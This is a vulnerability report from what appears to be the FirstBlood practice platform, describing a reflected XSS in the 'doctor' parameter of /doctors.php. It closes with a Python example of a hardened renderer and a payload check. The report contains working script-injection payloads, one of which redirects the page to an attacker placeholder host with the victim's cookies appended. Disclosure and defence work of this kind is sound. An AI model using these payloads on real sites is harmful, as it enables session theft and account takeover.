FirstBlood-#1127 Reflected XSS
This issue was discovered on FirstBlood v3

On 2022-12-08, pichik Level 4 reported:

Hello zseano,
Hope you are doing well, thanks for the next event.

My first bug is a reflected XSS in the /doctors.php endpoint. There is a parameter doctor which is reflected between <script> tags.
Didn't find any better impact yet, so reporting just a simple alert.

We just need to escape ' and separate our code, so it won't throw an error. Here is a payload with a simple alert: ';alert(1);'

POC LINK:;alert(document.domain);%27
As I found a way in, I am increasing the impact of this bug as it can be used in the same way as in my #1335 report. An attacker can use this bug to append cookies to a URL, send them to his server and steal doctors' accounts. Payload:

ACCOUNT TAKEOVER POC LINK:;window.location.href=%27[attacker-id]?%27%2Bdocument.cookie;%27
HTML encoding user-entered input should prevent XSS easily.
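The script-context reflection described in the report, shown as an added example that is not FirstBlood's own code: the real /doctors.php source is not on the page, so the template shape (the value landing in a single-quoted JS string) is assumed. The hardened renderer emits the value as a JSON string literal with `<`, `>` and `&` escaped as JS unicode escapes, and a small scanner checks whether any code follows the string literal, which is exactly what the `';alert(1);'` payload relies on.

```python
import json

PREFIX = "var doctor = "  # assumed statement inside the <script> element


def render_vulnerable(doctor: str) -> str:
    # Assumed 'before' shape: the ?doctor= value is reflected raw into a
    # single-quoted JS string, so a ' in the value terminates the literal.
    return f"<script>{PREFIX}'{doctor}';</script>"


def render_hardened(doctor: str) -> str:
    # json.dumps yields a valid JS string literal with quotes and backslashes
    # escaped. The extra replacements keep '</script>', '<!--' and entities out
    # of the output so the HTML parser cannot end the script element early.
    literal = json.dumps(doctor)
    literal = (literal.replace("<", "\\u003c")
                      .replace(">", "\\u003e")
                      .replace("&", "\\u0026"))
    return f"<script>{PREFIX}{literal};</script>"


def js_string_end(src: str, start: int) -> int:
    """Index just past the JS string literal starting at src[start] (a quote),
    honouring backslash escapes. Raises if the literal never terminates."""
    quote = src[start]
    i = start + 1
    while i < len(src):
        if src[i] == "\\":
            i += 2  # skip the escaped character
            continue
        if src[i] == quote:
            return i + 1
        i += 1
    raise ValueError("unterminated string literal")


def trailing_code(rendered: str) -> str:
    """Source that follows the doctor literal inside the <script> element.
    Anything beyond the terminating ';' means the value escaped the literal."""
    body = rendered[len("<script>"):rendered.index("</script>")]
    if not body.startswith(PREFIX):
        raise ValueError("unexpected template shape")
    return body[js_string_end(body, len(PREFIX)):]


def reflected_value(rendered: str) -> str:
    """Decode the literal the hardened renderer emitted (round-trip check)."""
    body = rendered[len("<script>"):rendered.index("</script>")]
    end = js_string_end(body, len(PREFIX))
    return json.loads(body[len(PREFIX):end])
```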

P3 Medium

Endpoint: /doctors.php

Parameter: doctor

Payload: ';alert(1);'

FirstBlood ID: 47
Vulnerability Type: Reflective XSS

The endpoint /doctors.php is vulnerable to reflective XSS via the ?doctor= parameter